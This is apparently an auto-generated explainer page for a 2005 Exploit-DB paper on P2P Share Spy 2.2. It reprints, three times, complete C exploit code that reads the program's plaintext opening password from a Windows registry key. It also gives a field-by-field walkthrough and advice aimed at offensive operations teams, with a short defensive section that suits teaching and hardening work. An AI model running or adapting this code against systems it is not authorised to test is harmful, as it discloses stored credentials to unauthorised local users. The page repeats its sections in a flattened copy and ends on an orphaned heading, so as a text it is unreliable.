By exploitdb papers bot•April 7, 2005•

papers

P2P Share Spy 2.2 Password Disclosure Exploit Explained

What this paper is

This paper details a local vulnerability in P2P Share Spy version 2.2. The vulnerability allows a local user to retrieve the program's opening password. The exploit works by reading the password directly from the Windows Registry.

Simple technical breakdown

P2P Share Spy 2.2 stores its configuration, including the program's opening password, in the Windows Registry. This exploit targets a specific registry key where the password is stored in plain text. By opening this key and querying the password value, the exploit can read and display it to the user.

Complete code and payload walkthrough

The provided C code is a simple Windows executable that interacts with the Windows Registry.

/*****************************************************************

P2P Share Spy 2.2 Local Exploit by Kozan

Application: P2P Share Spy 2.2
Vendor: Rebrand Software - www.rebrandsoftware.com
Vulnerable Description: P2P Share Spy 2.2 discloses passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

*****************************************************************/

#include <stdio.h>
#include <windows.h>

#define BUFSIZE 100
HKEY hKey;
char Password[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;

int main(void)
{

       if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\VB and VBA Program Settings\\P2P Share Spy\\Settings",
                                       0,
                                       KEY_QUERY_VALUE,
                                       &hKey) == ERROR_SUCCESS)
       {

           lRet = RegQueryValueEx( hKey, "txtPassword", NULL, NULL,(LPBYTE) Password, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("Not found!");
                                return 0;
                       }

                               RegCloseKey( hKey );

                       printf("P2P Share Spy 2.2 Local Exploit by Kozan\n");
                       printf("Credits to ATmaCA\n");
                       printf("www.netmagister.com  -  www.spyinstructors.com\n");
                       printf("kozan@netmagister.com\n\n");
                       printf("Program Opening Password : %s\n",Password);

        }
        else{
                printf("P2P Share Spy 2.2 is not installed on your system!\n");
        }

       return 0;
}

// milw0rm.com [2005-04-07]

Code Fragment/Block	Practical Purpose
`#include <stdio.h>`	Includes standard input/output functions (like `printf`).
`#include <windows.h>`	Includes Windows API functions necessary for registry operations.
`#define BUFSIZE 100`	Defines a constant for the buffer size to hold the password.
`HKEY hKey;`	Declares a variable to hold a handle to an open registry key.
`char Password[BUFSIZE];`	Declares a character array (buffer) to store the retrieved password.
`DWORD dwBufLen=BUFSIZE;`	Declares a variable to store the size of the password buffer, which will be updated by the registry function.
`LONG lRet;`	Declares a variable to store the return code from registry functions.
`int main(void)`	The entry point of the program.
`RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\VB and VBA Program Settings\\P2P Share Spy\\Settings", 0, KEY_QUERY_VALUE, &hKey)`	Attempts to open a specific registry key under the current user's hive.
`HKEY_CURRENT_USER`	Specifies that the operation should be performed on the registry hive for the currently logged-in user.
`"Software\\VB and VBA Program Settings\\P2P Share Spy\\Settings"`	The specific path to the registry key where P2P Share Spy stores its settings.
`0`	Reserved, must be zero.
`KEY_QUERY_VALUE`	Specifies the desired access rights to the registry key, allowing querying of values.
`&hKey`	A pointer to a variable that receives a handle to the opened registry key.
`== ERROR_SUCCESS`	Checks if the `RegOpenKeyEx` function was successful.
`RegQueryValueEx(hKey, "txtPassword", NULL, NULL, (LPBYTE)Password, &dwBufLen)`	Attempts to read the value of a specific registry entry.
`hKey`	The handle to the opened registry key.
`"txtPassword"`	The name of the registry value that contains the program's password.
`NULL, NULL`	These parameters are for type information and reserved, and are not used here.
`(LPBYTE)Password`	A pointer to the buffer where the retrieved value will be stored.
`&dwBufLen`	A pointer to a variable that contains the size of the buffer and receives the actual size of the data copied.
`lRet != ERROR_SUCCESS`	Checks if the `RegQueryValueEx` function failed.
`dwBufLen > BUFSIZE`	Checks if the retrieved password is larger than the allocated buffer, indicating a potential issue or truncation.
`RegCloseKey(hKey);`	Closes the opened registry key, releasing its handle.
`printf("Not found!");`	Prints a message indicating the password value was not found or could not be read.
`return 0;`	Exits the program.
`printf("P2P Share Spy 2.2 Local Exploit by Kozan\n");`	Prints the exploit's header information.
`printf("Program Opening Password : %s\n",Password);`	Prints the retrieved password to the console.
`else { printf("P2P Share Spy 2.2 is not installed on your system!\n"); }`	This block executes if `RegOpenKeyEx` failed, indicating the target registry key (and likely the application) is not present.

Payload/Shellcode Segment	Purpose
N/A (This is not a shellcode-based exploit)	This exploit does not involve shellcode. It's a direct read operation from the registry.

Practical details for offensive operations teams

Required Access Level: Local user access to the target Windows machine. No administrative privileges are required.
Lab Preconditions:
- A Windows machine with P2P Share Spy 2.2 installed.
- The target application must have been configured with an opening password, which would have been written to the registry.
- The exploit executable needs to be present on the target system.
Tooling Assumptions:
- A C compiler (like MinGW or Visual Studio) to compile the exploit source code into an executable.
- Standard Windows command-line environment to run the compiled executable.
Execution Pitfalls:
- Application Not Installed: If P2P Share Spy 2.2 is not installed, the exploit will report "P2P Share Spy 2.2 is not installed on your system!".
- Password Not Set: If the user never set a password for P2P Share Spy, the txtPassword registry value might not exist, leading to the "Not found!" message.
- Registry Key Modified: If the registry path or value name has been changed by a different version of the software or manual modification, the exploit will fail.
- Buffer Overflow (Unlikely Here): While BUFSIZE is defined, the RegQueryValueEx function is designed to handle varying data sizes. The check dwBufLen > BUFSIZE is a safeguard against reading more data than the buffer can hold, but it's unlikely to be a direct overflow vulnerability in this specific code. The primary risk is data truncation if the password exceeds BUFSIZE.
Telemetry:
- Process Execution: The execution of the compiled C program (.exe).
- Registry Access: The RegOpenKeyEx and RegQueryValueEx API calls targeting HKEY_CURRENT_USER\Software\VB and VBA Program Settings\P2P Share Spy\Settings and the txtPassword value.
- Standard Output: The printf statements displaying the exploit's status and the retrieved password.

Where this was used and when

This exploit targets P2P Share Spy 2.2, which was published in 2005. Exploits of this nature, which rely on plain-text storage of sensitive information in the registry, were common in the early to mid-2000s. While specific instances of this exact exploit being used in the wild are not detailed in the paper, it represents a class of vulnerabilities prevalent during that era for applications that stored configuration locally.

Defensive lessons for modern teams

Avoid Plain-Text Storage: Never store sensitive information like passwords in plain text, especially in easily accessible locations like the Windows Registry or configuration files.
Secure Configuration Management: Use secure methods for storing and retrieving configuration data. This might involve encryption, secure credential management systems, or relying on OS-provided secure storage mechanisms.
Registry Hardening: Limit unnecessary write access to critical registry locations. While this exploit doesn't require elevated privileges, restricting general read access to sensitive application configuration keys can be part of a broader security posture.
Regular Software Updates: Ensure all applications are kept up-to-date to patch known vulnerabilities.
Principle of Least Privilege: Applications should only have the permissions they absolutely need. If an application doesn't need to store its password in the registry, it shouldn't.

ASCII visual (if applicable)

This exploit's flow is linear and doesn't involve complex interactions or network components, making an ASCII visual less impactful. The core action is a direct read from a local data store.

+---------------------+      +-------------------------------------------------+
| Local User          |      | Windows Registry                                |
| (Runs Exploit)      |      |                                                 |
+---------------------+      +-------------------------------------------------+
        |                            ^
        | 1. Execute Exploit         |
        |--------------------------->| 2. RegOpenKeyEx(HKEY_CURRENT_USER\...)
        |                            |
        | 3. RegQueryValueEx(..., "txtPassword", ...)
        |--------------------------->|
        |                            |
        | 4. Receives Password       |
        |<---------------------------|
        |                            |
        | 5. Displays Password       |
        +----------------------------+

Source references

Paper ID: 920
Paper Title: P2P Share Spy 2.2 - Local Password Disclosure
Author: Kozan
Published: 2005-04-07
Keywords: Windows, local
Paper URL: https://www.exploit-db.com/papers/920
Raw URL: https://www.exploit-db.com/raw/920

Original Exploit-DB Content (Verbatim)

/*****************************************************************

P2P Share Spy 2.2 Local Exploit by Kozan

Application: P2P Share Spy 2.2
Vendor: Rebrand Software - www.rebrandsoftware.com
Vulnerable Description: P2P Share Spy 2.2 discloses passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

*****************************************************************/

#include <stdio.h>
#include <windows.h>

#define BUFSIZE 100
HKEY hKey;
char Password[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;

int main(void)
{

       if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\VB and VBA Program Settings\\P2P Share Spy\\Settings",
                                       0,
                                       KEY_QUERY_VALUE,
                                       &hKey) == ERROR_SUCCESS)
       {

           lRet = RegQueryValueEx( hKey, "txtPassword", NULL, NULL,(LPBYTE) Password, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("Not found!");
                                return 0;
                       }

                               RegCloseKey( hKey );

                       printf("P2P Share Spy 2.2 Local Exploit by Kozan\n");
                       printf("Credits to ATmaCA\n");
                       printf("www.netmagister.com  -  www.spyinstructors.com\n");
                       printf("kozan@netmagister.com\n\n");
                       printf("Program Opening Password : %s\n",Password);

        }
        else{
                printf("P2P Share Spy 2.2 is not installed on your system!\n");
        }

       return 0;
}

// milw0rm.com [2005-04-07]

Simple technical breakdown

Complete code and payload walkthrough

The provided C code is a simple Windows executable that interacts with the Windows Registry.

/***************************************************************** P2P Share Spy 2.2 Local Exploit by Kozan Application: P2P Share Spy 2.2 Vendor: Rebrand Software - www.rebrandsoftware.com Vulnerable Description: P2P Share Spy 2.2 discloses passwords to local users. Discovered & Coded by: Kozan Credits to ATmaCA Web : www.netmagister.com Web2: www.spyinstructors.com Mail: kozan@netmagister.com *****************************************************************/ #include <stdio.h> #include <windows.h> #define BUFSIZE 100 HKEY hKey; char Password[BUFSIZE]; DWORD dwBufLen=BUFSIZE; LONG lRet; int main(void) { if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\VB and VBA Program Settings\\P2P Share Spy\\Settings", 0, KEY_QUERY_VALUE, &hKey) == ERROR_SUCCESS) { lRet = RegQueryValueEx( hKey, "txtPassword", NULL, NULL,(LPBYTE) Password, &dwBufLen); if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){ RegCloseKey(hKey); printf("Not found!"); return 0; } RegCloseKey( hKey ); printf("P2P Share Spy 2.2 Local Exploit by Kozan\n"); printf("Credits to ATmaCA\n"); printf("www.netmagister.com - www.spyinstructors.com\n"); printf("kozan@netmagister.com\n\n"); printf("Program Opening Password : %s\n",Password); } else{ printf("P2P Share Spy 2.2 is not installed on your system!\n"); } return 0; } // milw0rm.com [2005-04-07]

Code Fragment/Block

Practical Purpose

#include <stdio.h>

Includes standard input/output functions (like printf).

#include <windows.h>

Includes Windows API functions necessary for registry operations.

#define BUFSIZE 100

Defines a constant for the buffer size to hold the password.

HKEY hKey;

Declares a variable to hold a handle to an open registry key.

char Password[BUFSIZE];

Declares a character array (buffer) to store the retrieved password.

DWORD dwBufLen=BUFSIZE;

Declares a variable to store the size of the password buffer, which will be updated by the registry function.

LONG lRet;

Declares a variable to store the return code from registry functions.

int main(void)

The entry point of the program.

RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\VB and VBA Program Settings\\P2P Share Spy\\Settings", 0, KEY_QUERY_VALUE, &hKey)

Attempts to open a specific registry key under the current user's hive.

HKEY_CURRENT_USER

Specifies that the operation should be performed on the registry hive for the currently logged-in user.

"Software\\VB and VBA Program Settings\\P2P Share Spy\\Settings"

The specific path to the registry key where P2P Share Spy stores its settings.

0

Reserved, must be zero.

KEY_QUERY_VALUE

Specifies the desired access rights to the registry key, allowing querying of values.

&hKey

A pointer to a variable that receives a handle to the opened registry key.

== ERROR_SUCCESS

Checks if the RegOpenKeyEx function was successful.

RegQueryValueEx(hKey, "txtPassword", NULL, NULL, (LPBYTE)Password, &dwBufLen)

Attempts to read the value of a specific registry entry.

hKey

The handle to the opened registry key.

"txtPassword"

The name of the registry value that contains the program's password.

NULL, NULL

These parameters are for type information and reserved, and are not used here.

(LPBYTE)Password

A pointer to the buffer where the retrieved value will be stored.

&dwBufLen

A pointer to a variable that contains the size of the buffer and receives the actual size of the data copied.

lRet != ERROR_SUCCESS

Checks if the RegQueryValueEx function failed.

dwBufLen > BUFSIZE

Checks if the retrieved password is larger than the allocated buffer, indicating a potential issue or truncation.

RegCloseKey(hKey);

Closes the opened registry key, releasing its handle.

printf("Not found!");

Prints a message indicating the password value was not found or could not be read.

return 0;

Exits the program.

printf("P2P Share Spy 2.2 Local Exploit by Kozan\n");

Prints the exploit's header information.

printf("Program Opening Password : %s\n",Password);

Prints the retrieved password to the console.

else { printf("P2P Share Spy 2.2 is not installed on your system!\n"); }

This block executes if RegOpenKeyEx failed, indicating the target registry key (and likely the application) is not present.

Payload/Shellcode Segment

Purpose

N/A (This is not a shellcode-based exploit)

This exploit does not involve shellcode. It's a direct read operation from the registry.

Practical details for offensive operations teams

Required Access Level: Local user access to the target Windows machine. No administrative privileges are required.

Lab Preconditions:

A Windows machine with P2P Share Spy 2.2 installed.
The target application must have been configured with an opening password, which would have been written to the registry.
The exploit executable needs to be present on the target system.

Tooling Assumptions:

A C compiler (like MinGW or Visual Studio) to compile the exploit source code into an executable.
Standard Windows command-line environment to run the compiled executable.

Execution Pitfalls:

Application Not Installed: If P2P Share Spy 2.2 is not installed, the exploit will report "P2P Share Spy 2.2 is not installed on your system!".
Password Not Set: If the user never set a password for P2P Share Spy, the txtPassword registry value might not exist, leading to the "Not found!" message.
Registry Key Modified: If the registry path or value name has been changed by a different version of the software or manual modification, the exploit will fail.
Buffer Overflow (Unlikely Here): While BUFSIZE is defined, the RegQueryValueEx function is designed to handle varying data sizes. The check dwBufLen > BUFSIZE is a safeguard against reading more data than the buffer can hold, but it's unlikely to be a direct overflow vulnerability in this specific code. The primary risk is data truncation if the password exceeds BUFSIZE.

Telemetry:

Process Execution: The execution of the compiled C program (.exe).
Registry Access: The RegOpenKeyEx and RegQueryValueEx API calls targeting HKEY_CURRENT_USER\Software\VB and VBA Program Settings\P2P Share Spy\Settings and the txtPassword value.
Standard Output: The printf statements displaying the exploit's status and the retrieved password.

Where this was used and when

Defensive lessons for modern teams

Avoid Plain-Text Storage: Never store sensitive information like passwords in plain text, especially in easily accessible locations like the Windows Registry or configuration files.

Secure Configuration Management: Use secure methods for storing and retrieving configuration data. This might involve encryption, secure credential management systems, or relying on OS-provided secure storage mechanisms.

Registry Hardening: Limit unnecessary write access to critical registry locations. While this exploit doesn't require elevated privileges, restricting general read access to sensitive application configuration keys can be part of a broader security posture.

Regular Software Updates: Ensure all applications are kept up-to-date to patch known vulnerabilities.

Principle of Least Privilege: Applications should only have the permissions they absolutely need. If an application doesn't need to store its password in the registry, it shouldn't.

ASCII visual (if applicable)

This exploit's flow is linear and doesn't involve complex interactions or network components, making an ASCII visual less impactful. The core action is a direct read from a local data store.

+---------------------+ +-------------------------------------------------+ | Local User | | Windows Registry | | (Runs Exploit) | | | +---------------------+ +-------------------------------------------------+ | ^ | 1. Execute Exploit | |--------------------------->| 2. RegOpenKeyEx(HKEY_CURRENT_USER\...) | | | 3. RegQueryValueEx(..., "txtPassword", ...) |--------------------------->| | | | 4. Receives Password | |<---------------------------| | | | 5. Displays Password | +----------------------------+

Original Exploit-DB Content (Verbatim)